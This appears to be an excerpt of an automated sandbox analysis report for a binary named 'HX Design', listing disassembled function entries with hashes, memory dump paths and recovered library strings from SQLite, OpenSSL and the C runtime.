                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                      • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                      • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                                      • Instruction ID: 94d5728b028eeeb74cbb77884a9a00c7886a046a4c8429e576379bb99012ac0d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB81C272D08243A5F764BF2D8118278A6A2EB11B84FD58031CA2D97295CFECFC49F721
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • 00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB38057F
                                                                                                                                                                                                                                                        • Part of subcall function 00007FFDFB2E8BF0: 00007FFE1A463010.VCRUNTIME140(?,?,?,00007FFDFB2E8606), ref: 00007FFDFB2E8C21
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: AND $<expr>$rowid
                                                                                                                                                                                                                                                      • API String ID: 4225454184-4041574714
                                                                                                                                                                                                                                                      • Opcode ID: bd8a3048d69df6166b223ea7dc75565c0762b21f5b460e88b0cbb52fce417d1a
                                                                                                                                                                                                                                                      • Instruction ID: 9688dfbe239a051933855005f9425a18fced912b1721020356c8446602f4a9bc
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd8a3048d69df6166b223ea7dc75565c0762b21f5b460e88b0cbb52fce417d1a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4A1AE72B4AA4386E704DF55D4A093877A1EB45B88F548035DA2E477ECDF3CE841CB91
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: %s.%s$column%d$rowid
                                                                                                                                                                                                                                                      • API String ID: 0-1505470444
                                                                                                                                                                                                                                                      • Opcode ID: 30ee24403bbbe39b15dc8828bd75070d7d44f9a04dc3d048d0a1485fb1bb9eaf
                                                                                                                                                                                                                                                      • Instruction ID: a12c16e90fd89e0d7103a7508e541f1e43e58a8339b2493b34cd1168da30a2cb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30ee24403bbbe39b15dc8828bd75070d7d44f9a04dc3d048d0a1485fb1bb9eaf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B91A022B0AB828ADB20EB15D464BA967A5FB49BB4F445326DA7D477E8DF38D401C300
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                      • API String ID: 0-3727861699
                                                                                                                                                                                                                                                      • Opcode ID: ac59a9cb4a734ac58b84e693e8c4ebf4f1f7077b93233f305f08416909222bbb
                                                                                                                                                                                                                                                      • Instruction ID: 5a111ef94da30ba1ac3b9bd83d492e325a50e1d8a48e7234f3f4dd4e02a40999
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac59a9cb4a734ac58b84e693e8c4ebf4f1f7077b93233f305f08416909222bbb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4581D762B096D257D7509B258190A7EBBE0FF41788F084132DB9947AE9CE3CE455C740
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: $, $CREATE TABLE
                                                                                                                                                                                                                                                      • API String ID: 4225454184-3459038510
                                                                                                                                                                                                                                                      • Opcode ID: eaaf35ae7b10ff9f02fc1879a24a9f13428addb4e320b869457f88e9802eb3dd
                                                                                                                                                                                                                                                      • Instruction ID: a4bcfa055dff27ea284fe1cb7d4b3e597cef6778636e8b2c16a6c5fbb723c2c8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eaaf35ae7b10ff9f02fc1879a24a9f13428addb4e320b869457f88e9802eb3dd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC613562B0A58286DB219F29A4506B9B7A2FB40BA8F444336DE7D433E9DF3CD546C300
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007
                                                                                                                                                                                                                                                      • String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new$ssl_get_new_session
                                                                                                                                                                                                                                                      • API String ID: 3568877910-2527649602
                                                                                                                                                                                                                                                      • Opcode ID: 81de3dcb5b9a74f6d10349495346cbec55276295be6eb05afdb2b4af8c059850
                                                                                                                                                                                                                                                      • Instruction ID: 272dcd8de8c64bf7739dc96dbd61274f6e5f883682ce88c598a851b86cf390d6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81de3dcb5b9a74f6d10349495346cbec55276295be6eb05afdb2b4af8c059850
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB719B25B08B828AE74ADB25D8903FD2391EB89B84F944135EB1D877EADF7CE5518300
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A461250
                                                                                                                                                                                                                                                      • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_server_name
                                                                                                                                                                                                                                                      • API String ID: 909805961-4157686371
                                                                                                                                                                                                                                                      • Opcode ID: df7c5cc1c5450ab236299e71f02084b029a770e3f54b11b68fceadd1af193070
                                                                                                                                                                                                                                                      • Instruction ID: 8f94ef1d7e0a8356a132853814e32d52518e5e459600dfc9fe585d1c1a1b3e37
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: df7c5cc1c5450ab236299e71f02084b029a770e3f54b11b68fceadd1af193070
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0061BE61F1CA9381F762DB21E4007BD6791AB86B84F488132DB4D47BFEDE6CE6908701
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                                      • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                      • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                                      • Instruction ID: d3077df64576c4ac8c499069be1209d2df6c603a8054bbb2a18b5d5ce8768f7e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9451E432B19642AADB14EF15E044A78B391FB44F88F908130DE6E57788EFBDE845D714
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                      • API String ID: 4225454184-3727861699
                                                                                                                                                                                                                                                      • Opcode ID: 75da13944be0d2eaaf71d09a02690a791e9ea79b5304e52c345f89a23cfe710d
                                                                                                                                                                                                                                                      • Instruction ID: e15a76b2006dc3861bf3b06fa20d65176d00a4148436f69e83d3be6e2f6dd5cb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75da13944be0d2eaaf71d09a02690a791e9ea79b5304e52c345f89a23cfe710d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B51E272709BC1C6CB109F19E4649AEBBA4FB54B88F19813AEB9D037A9DB3CD045C700
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: out of memory$string or blob too big
                                                                                                                                                                                                                                                      • API String ID: 4225454184-2410398255
                                                                                                                                                                                                                                                      • Opcode ID: 32c2ae49c0d43b0bf73bf14441e4c9b52f205afacfc25aad9bb6812841d0f57a
                                                                                                                                                                                                                                                      • Instruction ID: e5926ff295bb50c3d5aeb029fdd23964c6bb99dc958ef0cc7618713bd7d59060
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 32c2ae49c0d43b0bf73bf14441e4c9b52f205afacfc25aad9bb6812841d0f57a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C61F462B4A65393E710EB26D56067E6BA4FB46B94F145032EE6D07BEDCF3CE4028710
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                      • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                                      • Instruction ID: 3ff0ec4118221d5c5f5fa347dd57f2d483cbbc59d068c7651b482b107c95a8bd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C351B3327083429AEB34AB21D088269B7A0FB55B84F985136DA5E47F85CFBCE458D718
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                      • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                                      • Instruction ID: 4d90f1188ff7a7f9464b9f797c1b8cba77273c5fc9dd3856ad185efe238e326c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B61A432A08BC595E730AF15E4407AAF7A0FB94784F444225EB9D07B5ADFBCD194CB14
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: (join-%u)$(subquery-%u)
                                                                                                                                                                                                                                                      • API String ID: 4225454184-2916047017
                                                                                                                                                                                                                                                      • Opcode ID: e4b271abe33ea453b0af829f0d0b3c64b2499140cc847aae9644bee38be7c82c
                                                                                                                                                                                                                                                      • Instruction ID: 31636edbde3572d713f652c6f55f7e33fb7240ca4879b73963154771ec9e332a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4b271abe33ea453b0af829f0d0b3c64b2499140cc847aae9644bee38be7c82c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5251E572B2A64385EB618B17D464F3C23A1FB04BA4F565635CABD8B2ECDF2CE4418750
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2104253662.00007FFDFACE1000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDFACE0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104206646.00007FFDFACE0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFAD2A000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFAD38000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFAD87000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFAD8C000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFAD8F000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104600723.00007FFDFAD90000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104654670.00007FFDFAD92000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdface0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007B6570
                                                                                                                                                                                                                                                      • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                                                      • API String ID: 4069847057-87138338
                                                                                                                                                                                                                                                      • Opcode ID: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
                                                                                                                                                                                                                                                      • Instruction ID: e6543a9fab7fa91bc3ccc371cfad4e0600b3cccf753d5e7c75571d06a693cfcc
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3412976B0C74286EB188F18E494A6D7751EB90BA0F444230EABD47ADDDF3CD9818B40
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
